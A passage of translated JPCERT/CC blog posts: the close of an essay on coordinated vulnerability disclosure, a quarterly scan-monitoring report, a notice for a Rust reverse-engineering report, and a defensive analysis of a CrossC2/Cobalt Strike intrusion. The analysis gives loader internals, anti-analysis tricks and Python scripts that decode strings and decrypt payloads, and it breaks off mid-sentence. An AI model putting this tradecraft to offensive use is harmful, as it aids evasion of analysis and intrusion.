<h4>Does "showing that a vulnerability exists" make remediation happen?</h4> <p>If the goal were only to "reveal the existence of a vulnerability and issue a warning", then, as before the framework existed or as was once the case overseas, each party disclosing at its own discretion seems like the "shortest route". The problem is the question "then how is it fixed?"<br>In most vulnerability responses for consumer products, a fix is distributed at the same time as publication, and users are urged to apply it through the manufacturer's announcement.<br>For enterprise products, on the other hand, it is common practice to first notify user organizations individually and provide a fix or provisional workarounds/mitigations, and to publish once the risk has been reduced to some degree.<br>One practical reason is that "there are reliable means of communication for enterprise products that do not exist for consumer products"<a href="#fn6">[6]</a>, but another is that compromise of such a user's product can be expected to affect that corporate user's customers and stakeholders in turn, so there is a desire to take provisional measures in advance in case an attack exploiting the vulnerability occurs after publication.<br>Also, for enterprise products it is rare that a fix can be applied instantly; where customers or stakeholders are affected, many steps, resources, and costs are involved, such as system downtime and patch testing before remediation, so provisional measures until a full/root-cause fix can be made are extremely important.</p> <p>All of this, however, assumes "normal times". When exploitation has already occurred, or when the likelihood of exploitation is rising, action on a different timeline is needed; this is explained in the second part.</p>
<figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93.png" class="mt-asset-link"><img class="asset asset-image at-xid-3861097 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B32_%E4%BF%AE%E6%AD%A3%E5%AF%BE%E5%BF%9C%E3%81%AB%E5%BF%85%E8%A6%81%E3%81%AA%E6%9C%9F%E9%96%93-800wri.png" alt="" width="800" height="390"></a> <figcaption>Figure 2: Time needed for remediation</figcaption> </figure>
<h4>The "total value" of vulnerability publication</h4>
<p>In vulnerability coordination, discoverer and manufacturer are basically aligned in their objective of "disclosure". What becomes a problem is that their (expected) "timing" differs.<br>Each side has its desired publication timing, and any gap between them is a disadvantage to one side (as shown in Figure 3). As noted above, remediation often requires a considerable period both within the manufacturer and on the user side, so the manufacturer's desired publication timing tends to fall later on the time axis than the discoverer's. The discoverer, on the other hand, also has their own circumstances<a href="#fn7">[7]</a>, such as a planned presentation at an international conference (to repeat: the situation is different when the likelihood of exploitation is rising or exploitation has already occurred; this is covered in the second part). This adjustment, too, incurs transaction costs as noted above, so the coordination framework is used to reduce those costs and to find a publication timing that both sides can accept.</p>
<p>Note that such coordination is not merely about reconciling "the interests of each of the two parties", the discoverer and the manufacturer. If a vulnerability is not disclosed appropriately, it may trigger exploitation, and beyond the manufacturer, users and social infrastructure as a whole may suffer, for example through the cost burden and economic losses that result when the product's users see their intended remediation timing and resources change drastically. What the Coase theorem described above offers is a perspective on how the "total value" can be distributed, and the vulnerability information handling framework can likewise be seen as a framework for society as a whole to obtain the benefits of vulnerability disclosure.<br>In discussions of vulnerability disclosure one often sees the term "public interest", but direct negotiation between two parties inevitably tends to fall into "reconciling the interests of the two parties". As described above, the author believes that to adjust the "total value" for society as a whole, coordination based on the vulnerability notification framework, which allows efficient coordination, is preferable.</p>
<p>As in the previous section, the discussion so far covers "normal times", when exploitation has not yet been confirmed and its likelihood has not risen. When exploitation has already occurred or the threat is imminent, a different decision axis is needed; this too is explained in the second part.</p>
<figure class="mt-figure mt-figure-center"><a href="https://blogs.jpcert.or.jp/ja/.assets/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32.png" class="mt-asset-link"><img class="asset asset-image at-xid-3876912 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;" src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/%E5%9B%B33_%E5%90%84%E3%83%97%E3%83%AC%E3%83%BC%E3%83%A4%E3%83%BC%E3%81%AE%E6%83%85%E5%A0%B1%E9%96%8B%E7%A4%BA%E3%82%BF%E3%82%A4%E3%83%9F%E3%83%B3%E3%82%B0%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%83%E3%83%97_%E4%BF%AE%E6%AD%A32-640wri.png" alt="" width="640" height="638"></a> <figcaption>Figure 3: Gaps in the disclosure timing of each player</figcaption> </figure>
<h4>Summary of the first part: a framework that guarantees predictability</h4>
<p>That this globally unusual framework has operated for more than 20 years as a mechanism without strong obligations or penalties is entirely due to the understanding and cooperation of each public and private player. Most importantly, it is a mechanism that holds together because engineers and researchers understand both the technical nature of vulnerabilities and the realities of how products are provided and used, and because various public bodies and the media understand the advantages of the mechanism.</p>
<p>As noted above, overseas there have been many cases of vulnerability information being disclosed without reaching agreement with the manufacturer, and there are voices defending this, in an "the end justifies the means" manner, as "disclosure is desirable from the standpoint of the public interest" even if the method is somewhat forceful. We believe, however, that such an approach produces long-term disadvantages (including for discoverers).</p>
<p>When such uncoordinated disclosure takes place, it affects not only the case at hand but subsequent, future vulnerability coordination. Manufacturers come to distrust vulnerability discoverers, and because this makes their responses appear reluctant, discoverers come to distrust manufacturers... and a chain of distrust accumulates. The reverse pattern also exists: as cases increase where manufacturers fail to respond to discoverers' reports, discoverers come to distrust them, feeling that "if you tell the manufacturer it just gets buried", and lean toward full disclosure.</p>
<p>Laws and rules function because their operational outcomes can be predicted to a certain degree. In the case of the vulnerability-related information handling framework, because the rules "the discoverer reports to the reception desk", "do not leak to third parties without authorization", "the coordinating body steps in to coordinate publication", and "the product developer fixes and publishes the vulnerability" are set out in advance, the actions of the parties are visible (predictable). And because the results are made public (the manufacturer's announcement, JVN publication, and crediting the discoverer), it can be verified that "the parties acted according to the rules". It is because this predictability is guaranteed that each player can handle vulnerability information, an extremely risky kind of information, stably and without falling into mutual suspicion. An "the end justifies the means" type of move follows rules internal to the person or organization that acted, and has no predictability.</p>
<p>Whether the current framework is the best is a separate discussion, but in the second part we introduce the little-known response operations carried out when a vulnerability is exploited, and consider the future issues and points of discussion visible from the front lines of framework operation and incident response.</p>
<h4>References</h4> <p><a name="fn1"></a>[1] METI, "Vulnerability-related information handling framework" https://www.meti.go.jp/policy/netsecurity/vulinfo.html<br>Standards for Handling Software Vulnerability-Related Information https://www.meti.go.jp/policy/netsecurity/vul_notification.pdf<br>Information Security Early Warning Partnership Guidelines https://www.ipa.go.jp/security/guide/vuln/partnership_guide.html<br>Manual for the publication of vulnerability countermeasure information by software product developers https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html#section6</p> <p><a name="fn2"></a>[2] For studies on improving the framework as a whole and annual activity reports, see the reports for each fiscal year of the Study Group on the Handling of Vulnerability Information in Information Systems https://www.ipa.go.jp/security/reports/vuln/kenkyukai-report2023.html</p> <p><a name="fn3"></a>[3] https://www.ipa.go.jp/archive/files/000072543.pdf</p> <p><a name="fn4"></a>[4] On the impact of unintended disclosure of information related to cyber attack damage on information-sharing activities https://blogs.jpcert.or.jp/ja/2023/12/leaks-and-breaking-trust.html</p> <p><a name="fn5"></a>[5] 飯田高 (Iida Takashi), 『法と社会科学をつなぐ』 [Connecting Law and the Social Sciences] (Yuhikaku), page 136</p> <p><a name="fn6"></a>[6] A derived point of discussion is the pros and cons of responding basically through closed, individual notification, without immediately publishing or issuing an alert, in cases of vulnerability exploitation in enterprise products. On this point, see page 97 of the "Guidance on Sharing and Publishing Information Related to Cyber Attack Damage" https://www.cyber.go.jp/pdf/council/cs/kyogikai/guidance2022_honbun.pdf</p> <p><a name="fn7"></a>[7] Preventing disadvantage to manufacturers and users is important, but we also consider the discoverer's motivation important for keeping the cycle of vulnerability discovery and remediation healthy.</p>
  51. TSUBAME Report Overflow (April to June 2025)

    Thu, 11 Sep 2025 02:00:00 -0000

<h3>Introduction</h3> <p>In this blog, "TSUBAME Report Overflow", timed with the release of the quarterly "<a href="https://www.jpcert.or.jp/tsubame/report/">Internet Threat Monitoring Report</a>", we cover comparisons of observation trends from the sensors installed overseas that are not described in the report, along with other activities.<br>This time we introduce the observation results of TSUBAME (the Internet threat monitoring system) for April to June 2025.</p>
<h3>Fluctuations in packets from Iran apparently related to the military conflict between Israel and Iran</h3> <p>From around June 13 to 25, 2025, there was a military conflict between Israel and Iran. Packets observed from Iran fluctuated during the same period, so we take this up here. Figure 1 graphs, for each day from June 1 to 30, the number of source IP addresses from Iran and from Israel respectively.</p> <table style="border-collapse: collapse; width: 100%;" border="1"> <tbody> <tr> <td> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig1.png" width="1179" height="577" alt="" class="asset asset-image at-xid-3752125" style="display: block;"/></a> </td> </tr> <tr> <td style="text-align: center;">Figure 1: Trend in the number of source IP addresses from Israel and from Iran</td> </tr> </tbody> </table> <p>The number of source IP addresses for packets from Iran had been hovering around 170 to 200 per day, but fell to around 100 to 130 from about June 13 to 18, and dropped sharply, though temporarily, to around 20 to 100 from June 19 to 27. In contrast, no major fluctuation was seen in the number of source IP addresses from Israel.<br>Some media outlets also reported that from around June 18, Iran's state broadcaster, banks, cryptocurrency exchanges, and others suffered attacks. It was also reported that the Iranian government temporarily restricted Internet connectivity to reduce the damage from cyber attacks, so the decrease in the number of source IP addresses is thought to reflect that network shutdown.</p>
<h3>Comparison of observation trends in Japan and overseas</h3> <p>Figure 2 compares, by month, the average number of packets received per sensor per day in Japan and overseas. The overseas sensors observed more packets than the domestic ones. For both domestic and overseas sensors, April had the highest count, and the count has gradually decreased month by month.</p> <table style="border-collapse: collapse; width: 100%;" border="1"> <tbody> <tr> <td> <a class="mt-asset-link" href="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png"><img src="https://blogs.jpcert.or.jp/ja/.assets/2025_of_q1_fig2.png" width="1153" height="573" alt="" class="asset asset-image at-xid-3752127" style="display: block;"/></a> </td> </tr> <tr> <td style="text-align: center;">Figure 2: Monthly comparison of average packet counts for domestic and overseas sensors</td> </tr> </tbody> </table>
<h3>Comparison of observation trends by sensor</h3> <p>Each sensor is assigned one global IP address. To see whether observations differ between sensors in Japan, North America, Europe, and other regions, Table 1 summarizes the top 10 packet types received by each. The rankings differ by sensor, but 22/TCP, 23/TCP, 80/TCP, 443/TCP, 8080/TCP, and so on were observed by almost all sensors. This suggests that scanning is being carried out across wide-ranging networks.</p> <p style="text-align: center;">Table 1: Comparison of the top 10 packet types per domestic and overseas sensor</p> <table> <tbody> <tr><th></th><th>Domestic sensor 1</th><th>Domestic sensor 2</th><th>North America sensor 1</th><th>North America sensor 2</th><th>Europe sensor 1</th><th>Europe sensor 2</th><th>Other-region sensor 1</th><th>Other-region sensor 2</th></tr> <tr><td align="right">1st</td><td>23/TCP</td><td>23/TCP</td><td>80/TCP</td><td>80/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td><td>23/TCP</td></tr> <tr><td align="right">2nd</td><td>443/TCP</td><td>8728/TCP</td><td>22/TCP</td><td>ICMP</td><td>443/TCP</td><td>22/TCP</td><td>80/TCP</td><td>80/TCP</td></tr> <tr><td align="right">3rd</td><td>80/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>443/TCP</td><td>80/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>8728/TCP</td></tr> <tr><td align="right">4th</td><td>8443/TCP</td><td>22/TCP</td><td>23/TCP</td><td>23/TCP</td><td>22/TCP</td><td>80/TCP</td><td>22/TCP</td><td>443/TCP</td></tr> <tr><td align="right">5th</td><td>8728/TCP</td><td>ICMP</td><td>443/TCP</td><td>8728/TCP</td><td>8728/TCP</td><td>34567/TCP</td><td>443/TCP</td><td>22/TCP</td></tr> <tr><td align="right">6th</td><td>22/TCP</td><td>443/TCP</td><td>8080/TCP</td><td>22/TCP</td><td>445/TCP</td><td>ICMP</td><td>ICMP</td><td>ICMP</td></tr> <tr><td align="right">7th</td><td>ICMP</td><td>81/TCP</td><td>ICMP</td><td>8080/TCP</td><td>ICMP</td><td>443/TCP</td><td>8080/TCP</td><td>8080/TCP</td></tr> <tr><td align="right">8th</td><td>8080/TCP</td><td>8080/TCP</td><td>3389/TCP</td><td>6379/TCP</td><td>8080/TCP</td><td>81/TCP</td><td>81/TCP</td><td>81/TCP</td></tr> <tr><td align="right">9th</td><td>81/TCP</td><td>5555/TCP</td><td>445/TCP</td><td>3389/TCP</td><td>1433/TCP</td><td>8080/TCP</td><td>5555/TCP</td><td>5555/TCP</td></tr> <tr><td align="right">10th</td><td>6379/TCP</td><td>3389/TCP</td><td>81/TCP</td><td>81/TCP</td><td>6379/TCP</td><td>445/TCP</td><td>6379/TCP</td><td>6379/TCP</td></tr> </tbody> </table>
<h3>Conclusion</h3> <p>Observing at multiple points makes it possible to judge whether a fluctuation is occurring only in a specific network. This quarter did not lead to any special extra-edition alerts, but the presence of scanners still deserves attention. We plan to continue publishing this blog regularly in step with report releases, and to publish extra editions when unusual changes occur. We welcome your opinions and feedback; if there are items you would like us to dig into or content you would like us to cover, please send them via the contact form. Thank you for reading to the end.</p> <p style="text-align: right">Cyber Metrics Group, 鹿野 恵祐</p>
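As an added example (not code from the original post or from JPCERT/CC's TSUBAME system), the following Python reproduces two of the analyses above over constructed sample records: the daily count of distinct source IP addresses per source country with a crude drop detector (the Iran observation in Figure 1), and the per-sensor top-N port ranking with the ports common to every sensor (the Table 1 observation). The record format, sensor names, country codes and thresholds are assumptions made for this example.

```python
"""
Added example (not JPCERT/CC's own TSUBAME code): two of the analyses the
post describes, run over a constructed sample of sensor records.

  1. Daily count of distinct source IP addresses per source country, plus a
     crude detector for the sudden decrease the post shows for Iran.
  2. Per-sensor "top N" ranking of destination port/protocol and the set of
     targets present in every sensor's top N (the Table 1 observation).

The line format, sensor names and thresholds are assumptions made for this
example; all records are constructed, not real observation data.
"""
from collections import Counter, defaultdict
from datetime import date
import statistics


def parse_record(line):
    """Parse 'YYYY-MM-DD,sensor,src_ip,src_country,target' (assumed format);
    target is 'port/proto' for TCP/UDP or the bare protocol name (e.g. ICMP)."""
    day, sensor, ip, country, target = line.strip().split(",")
    return date.fromisoformat(day), sensor, ip, country, target


def _build_sample():
    """Constructed records: Iran (IR) hosts drop sharply from June 5,
    Israel (IL) stays flat, and background scanning from US addresses gives
    each sensor a distinct port ranking."""
    lines = []
    sensor_ports = {"jp1": ["23/TCP", "443/TCP", "80/TCP"],
                    "na1": ["80/TCP", "22/TCP", "23/TCP"]}
    for day in range(1, 7):
        ir_hosts = 8 if day < 5 else 2
        for i in range(ir_hosts):
            lines.append(f"2025-06-{day:02d},jp1,198.51.100.{i},IR,23/TCP")
        for i in range(5):
            lines.append(f"2025-06-{day:02d},jp1,198.51.100.{100 + i},IL,80/TCP")
        for sensor, ports in sensor_ports.items():
            for rank, target in enumerate(ports):
                for i in range(3 - rank):   # rank 0: 3 hits/day, rank 2: 1 hit/day
                    lines.append(f"2025-06-{day:02d},{sensor},203.0.113.{i},US,{target}")
    return [parse_record(ln) for ln in lines]


SAMPLE = _build_sample()


def daily_unique_sources(records, country):
    """Map each day (ascending) to the number of distinct source IPs from `country`."""
    per_day = defaultdict(set)
    for day, _sensor, ip, ctry, _target in records:
        if ctry == country:
            per_day[day].add(ip)
    return {d: len(ips) for d, ips in sorted(per_day.items())}


def detect_drop(daily, baseline_days, ratio=0.5):
    """Return the days after the baseline window whose count falls below
    `ratio` times the median of the first `baseline_days` days. This is a
    deliberately simple stand-in for the eyeballing described in the post."""
    days = sorted(daily)
    base = statistics.median(daily[d] for d in days[:baseline_days])
    return [d for d in days[baseline_days:] if daily[d] < ratio * base]


def top_targets(records, n=10):
    """Per-sensor ranking of destination port/protocol by packet count."""
    counts = defaultdict(Counter)
    for _day, sensor, _ip, _ctry, target in records:
        counts[sensor][target] += 1
    return {s: [t for t, _ in c.most_common(n)] for s, c in counts.items()}


def common_to_all(ranking):
    """Targets that appear in every sensor's top-N list (wide-area scanning hint)."""
    lists = list(ranking.values())
    return set(lists[0]).intersection(*lists[1:]) if lists else set()


if __name__ == "__main__":
    ir = daily_unique_sources(SAMPLE, "IR")
    print("IR distinct sources per day:", {d.isoformat(): c for d, c in ir.items()})
    print("IR drop days:", [d.isoformat() for d in detect_drop(ir, baseline_days=4)])
    ranking = top_targets(SAMPLE, n=3)
    print("Top-3 per sensor:", ranking)
    print("Common to all sensors:", sorted(common_to_all(ranking)))
```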
  52. Publication of the Rust Binary Reverse Engineering Research Report

    Tue, 02 Sep 2025 02:00:00 -0000

    Rust is expected to become a replacement for C and C++, and its memory safety...
    <p>Rust is expected to become a replacement for C and C++, and it has attracted attention in recent years for its memory safety and performance. As Rust spreads as a programming language, malware developed in Rust (hereafter "Rust malware"), such as the Rust variant of SysJoker and the BlackCat ransomware, has been increasing in recent years. However, knowledge of reverse engineering techniques for Rust malware is still insufficient compared with the techniques for classic C and C++ malware. JPCERT/CC has therefore published today the "Reverse Engineering Research Report on Binaries Written in Rust", which summarizes the results of our investigation into reverse engineering binaries written in Rust (hereafter "Rust binaries").</p> <p><a href="https://github.com/JPCERTCC/rust-binary-analysis-research-ja">Reverse Engineering Research Report on Binaries Written in Rust</a></p> <p>This post introduces the report.</p> <h3>Contents of the report</h3> <p>The report selects research items related to reverse engineering Rust binaries and summarizes the results of investigating and verifying each of them. See Appendix A for the full list of research items. The versions of the tools used in this research are shown below; the binaries were compiled and examined in a Windows MSVC environment.</p> <pre style="background:#25292f;color: #fff;"> <code>cargo: 1.82.0
rustc: 1.82.0
IDA Pro v8.3.230608</code> </pre> <h3>How to use the report</h3> <p>Each research item in the report is self-contained, so you can refer only to the items you are interested in rather than reading the whole report. Some items also include sample programs; we recommend checking the items of interest, compiling the sample programs yourself and examining the resulting Rust binaries alongside the report.</p> <h3>Closing</h3> <p>Rust is spreading rapidly, and because reverse engineering Rust binaries is considered relatively difficult, we expect abuse by attackers to increase. We hope this report helps, even a little, with reverse engineering Rust malware. If you find any errors or have comments on the contents, please let us know.</p> <p style="text-align: right">Incident Response Group, Tomoya Kamei (亀井 智矢)</p> <h3>Appendix A: Research items</h3> <table> <caption>Table 1: Research items</caption> <thead> <tr> <td style="background-color: #bdbdbd; width: 50px; text-align: center;">No.</td> <td style="background-color: #bdbdbd; width: 350px; text-align: center;">Item</td> <td style="background-color: #bdbdbd; width: 500px; text-align: center;">Summary</td> </tr> </thead> <tbody> <tr> <td>1</td> <td>Binary differences caused by changing Cargo profile settings</td> <td>Investigates how much the publicly documented cargo-based binary size reduction techniques actually reduce size, and what information remains</td> </tr> <tr> <td>2</td> <td>Binary size reduction</td> <td>Investigates how much the publicly documented rustc-based binary size reduction techniques actually reduce size, and what information remains</td> </tr> <tr> <td>3</td> <td>Identifying Rust binaries</td> <td>How to identify whether a binary was compiled from Rust</td> </tr> <tr> <td>4</td> <td>Exception Directory</td> <td>Information obtainable from the structure of the Exception Directory</td> </tr> <tr> <td>5</td> <td>TLS Directory</td> <td>Information obtainable from the structure of the TLS Directory and the contents of TLS callbacks</td> </tr> <tr> <td>6</td> <td>Locating the main function and initialization</td> <td>How to locate the user-defined main function</td> </tr> <tr> <td>7</td> <td>Strings</td> <td>How strings are handled</td> </tr> <tr> <td>8</td> <td>Function name mangling</td> <td>Structure of mangled function names and how to demangle them</td> </tr> <tr> <td>9</td> <td>Closures</td> <td>Behaviour of closures and the memory layout they use</td> </tr> <tr> <td>10</td> <td>Enums</td> <td>How Rust enums are implemented in assembly</td> </tr> <tr> <td>11</td> <td>match statements</td> <td>How Rust match statements are implemented in assembly</td> </tr> <tr> <td>12</td> <td>Panics</td> <td>Differences in assembly between the unwind and abort panic strategies</td> </tr> <tr> <td>13</td> <td>Iterators</td> <td>How code using iterators and the next function is implemented in assembly</td> </tr> <tr> <td>14</td> <td>Traits</td> <td>Differences between calls to trait-implemented functions and ordinary function calls</td> </tr> <tr> <td>15</td> <td>Identifying common traits</td> <td>How to identify traits used with the #[derive] attribute in assembly</td> </tr> <tr> <td>16</td> <td>Dynamic dispatch</td> <td>Assembly characteristics and differences between calls using dynamic and static dispatch</td> </tr> <tr> <td>17</td> <td>Collections</td> <td>Memory layouts used</td> </tr> <tr> <td>18</td> <td>Identifying functions generated from the same generic</td> <td>How to identify the generic function they were instantiated from</td> </tr> <tr> <td>19</td> <td>Smart pointers</td> <td>Characteristics and memory layout of smart pointers</td> </tr> <tr> <td>20</td> <td>Inline assembly</td> <td>Characteristic code patterns</td> </tr> <tr> <td>21</td> <td>link attribute</td> <td>Differences in how libraries are linked</td> </tr> <tr> <td>22</td> <td>repr attribute</td> <td>How the memory layout changes with each of the available options</td> </tr> <tr> <td>23</td> <td>Distinguishing standard and third-party libraries</td> <td>How to identify statically linked standard library and third-party library functions</td> </tr> </tbody> </table>
  53. Attacks using "CrossC2", a tool that extends Cobalt Strike Beacon functionality across platforms

    Thu, 14 Aug 2025 05:00:00 -0000

    Between September and December 2024, JPCERT/CC confirmed incidents involving CrossC2, an extension tool for creating Cobalt Strike Beacons that run on Linux...
    <p>Between September and December 2024, JPCERT/CC confirmed incidents involving CrossC2, an extension tool that can create Cobalt Strike Beacons that run on Linux. Besides CrossC2, the attacker used PsExec, Plink and Cobalt Strike while attempting to break into Active Directory. We also confirmed that they used their own malware (hereafter "ReadNimeLoader") as a loader for Cobalt Strike. Judging from VirusTotal submission information, this campaign may have been observed not only in Japan but in several other countries.</p> <p>This post explains the CrossC2 and Cobalt Strike malware confirmed in this campaign and the tools the attacker used. Finally, it introduces a tool JPCERT/CC has released to support the analysis of CrossC2.</p> <h3>CrossC2</h3> <p>CrossC2 is an unofficial Beacon, written in C, for Cobalt Strike version 4.1 and later, together with its builder. It is developed to run on Linux (x86, x64) and macOS (x86, x64, M1). The CrossC2 builder is published on GitHub<a href="#1">[1]</a> and can be used to create Beacons, but neither the builder's source code nor the Beacon's source code is public.</p> <p>Immediately after starting, CrossC2 forks, and the main processing runs in the child process. The C2 destination is taken from the configuration, but the C2 server's host and port can also be taken from the environment variables <strong>"CCHOST"</strong> and <strong>"CCPORT"</strong>. After starting, CrossC2 communicates with the Cobalt Strike TeamServer and can execute various Cobalt Strike commands, although the set of commands it can execute is small compared with the real Cobalt Strike. The Beacon implements the following anti-analysis features.</p> <ul> <li>String encoding with single-byte XOR</li> <li>Insertion of large amounts of meaningless code</li> </ul> <p>Figure 1 shows part of the inserted meaningless code. The main functions contain a large amount of it, but it can be removed easily by replacing the following byte sequence with NOP instructions.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>8B 85 ?? ?? ?? ?? 2D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ??
E9 00 00 00 00</pre> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS01-800wri.png" width="800" height="912" alt="" class="asset asset-image at-xid-3824881 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 1: Part of CrossC2's obfuscation code </div> <p><br></p> <p>The configuration data is stored at the end of the file. CrossC2 obtains its own file path with the readlink function, freads its own code and searches for the string <strong>"HOOK"</strong> to find the address of the configuration data. The configuration has the following structure, and the encrypted configuration data can be decrypted with <strong>AES128-CBC (no padding)</strong>. CrossC2 uses functions from the <strong>OpenSSL library</strong> for decryption.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>0x0: "HOOK" search tag
0x4: size of the configuration data
0x8: encrypted configuration data</pre> <p>CrossC2 can create Beacons through an extension to a legitimate TeamServer. By default the created Beacon is packed with UPX, but attempting to unpack it with UPX fails. To unpack it, first remove the configuration data from the end of the file, unpack with UPX, and then append the configuration data to the end of the unpacked file.</p> <h3>Cobalt Strike</h3> <p>Figure 2 shows the flow up to the execution of Cobalt Strike. Execution of the malware starts from java.exe, a legitimate file run from a scheduled task registered by the attacker. java.exe loads jli.dll, which is ReadNimeLoader, via DLL side-loading. ReadNimeLoader is a loader written in the Nim language. It reads the data file readme.txt from the same folder, decrypts it and executes it in memory. readme.txt contains OdinLdr<a href="#2">[2]</a>, an open-source shellcode-format loader, which decodes the Cobalt Strike Beacon encoded inside it and executes it in memory. The set of files, including ReadNimeLoader, was stored on the victim host under the path <strong>"C:\$recycle.bin\"</strong>. We also confirmed that some ReadNimeLoader samples carried the following PDB path.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>D:\BuildServer\bna-4\work-git\phoenix-repository\phoenix\Release\Battle.net Launcher.exe.pdb</pre> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS02-800wri.png" width="800" height="337" alt="" class="asset asset-image at-xid-3824886 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 2: Flow of execution up to Cobalt Strike </div> <p><br></p> <h4>ReadNimeLoader</h4> <p>ReadNimeLoader has the following four anti-analysis features.</p> <ul> <li>Debugger check using the BeingDebugged value in the PEB</li> <li>Debugger check using the CONTEXT_DEBUG_REGISTERS values</li> <li>Debugger check that takes the difference in elapsed time and flags a debugger if the value is 0x512 or more</li> <li>Debugger check that raises an exception and checks whether the exception handler receives it</li> </ul> <p>Parts of the key needed to decrypt OdinLdr are stored inside the functions implementing these anti-analysis checks; unless those functions are executed, the correct key is not generated and OdinLdr cannot be decrypted. In addition, meaningless code is inserted as a further anti-analysis measure; part of it is shown in Figure 3.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS03-640wri.png" width="640" height="629" alt="" class="asset asset-image at-xid-3824887 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 3: Part of the obstructive code </div> <p><br></p> <p>The strings used by ReadNimeLoader are encoded, and two distinctive XOR-based decoding functions are used. Part of each is shown in Figure 4.</p> <p><img src="https://blogs.jpcert.or.jp/ja/.assets/thumbnail/LinuxCS04-800wri.png" width="800" height="370" alt="" class="asset asset-image at-xid-3824888 mt-image-center" style="display: block; margin-left: auto; margin-right: auto;"/></p> <div style="text-align: center;"> Figure 4: The two decoding functions </div> <p><br></p> <p>The encoded strings can be decoded with the following Python script. Older versions of ReadNimeLoader do not contain the decoding function corresponding to decode02 in the script; it appears to have been added later in a version update.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>def BYTE1(in_data):
    return (in_data >> 8) & 0xff

def BYTE2(in_data):
    return (in_data >> 16) & 0xff

def BYTE3(in_data):
    return (in_data >> 24) & 0xff

def decode02(enc_bytes, xor_key):
    # Every byte is XORed with the same combination of the key's bytes, each masked with 0xEE
    result = []
    for enc_byte in enc_bytes:
        enc_byte ^= (BYTE3(xor_key) & 0xEE) ^ (BYTE2(xor_key) & 0xEE) ^ ((xor_key ^ BYTE1(xor_key)) & 0xEE)
        result.append(enc_byte)
    return result

def decode01(enc_bytes, xor_key):
    # Every byte is XORed in turn with all four bytes of the key, each masked with 0xEE
    xor_table = [0, 8, 0x10, 0x18]
    result = []
    for enc_byte in enc_bytes:
        for j in range(4):
            enc_byte ^= ((xor_key >> xor_table[j]) & 0xEE)
        result.append(enc_byte)
    return result</pre> <p>ReadNimeLoader uses <strong>AES-256 in ECB mode</strong> to decrypt the malware body. The key is built by concatenating specific strings decoded by the functions above into one string, converting it to hexadecimal, upper-casing the hex string and zero-padding it. It can be decrypted with the following Python script.</p> <pre style='padding: 10px 10px;color:#d1d1d1;background:#1f1f1f;overflow: auto;white-space: pre'>from Crypto.Cipher import AES
import binascii

def ZeroPadding(hexstr, num):
    # Pad the upper-cased hex key with NUL bytes up to num bytes (32 for AES-256)
    padding_num = num - len(hexstr)
    if padding_num < 0:
        return hexstr
    return hexstr + b"\x00" * padding_num

def decrypt(readme_data, key_string):
    # key_string is the concatenation of the decoded strings (see the Key column in Appendix B)
    capitalized_key = binascii.hexlify(key_string.encode("ascii")).upper()
    key = ZeroPadding(capitalized_key, 32)
    cipher = AES.new(key, AES.MODE_ECB)
    return cipher.decrypt(readme_data)</pre> <h4>OdinLdr</h4> <p>After starting, OdinLdr decrypts the Cobalt Strike Beacon encoded inside it and runs it in memory. At fixed intervals it re-encrypts the Beacon on newly allocated heap memory with a randomly generated XOR key, presumably to evade memory scanning. A distinctive feature is the string <strong>"OdinLdr1337"</strong> at the start of that heap memory. Among the shellcode deployed by ReadNimeLoader we have seen both samples that run the Cobalt Strike Beacon through OdinLdr and samples that run the Beacon directly.</p> <p>Appendix B lists, for each ReadNimeLoader version, the key used to decode the malware body, the readme.txt it loads and the encoded malware body. Part of the Cobalt Strike configuration that was used is given in Appendix C.</p> <h3>Tools used by the attacker</h3> <p>Several ELF versions of SystemBC were among the tools the attacker used. For information such as the differences from the Windows version of SystemBC, see the report by ANY.RUN<a href="#3">[3]</a>. Other tools confirmed include PsExec, which is often used for lateral movement, GetNPUsers<a href="#4">[4]</a>, which is used for AS-REP Roasting attacks, the SSH client Plink, and privilege escalation tools for Windows.</p> <h3>Attribution</h3> <p>The domain used for the Cobalt Strike C2 we confirmed is the same as a C2 in the Black Basta article published by Rapid7<a href="#5">[5]</a>; files named jli.dll and readme.txt were used for ReadNimeLoader; and, although the architecture differs, the use of SystemBC and of AS-REP for attacks on AD also match. We therefore consider it possible that this attacker and campaign have some connection to Black Basta.</p> <h3>CrossC2 analysis tool</h3> <p>As an analysis tool for CrossC2, we have published a configuration parser on GitHub. Please make use of it.</p> <p>GitHub: 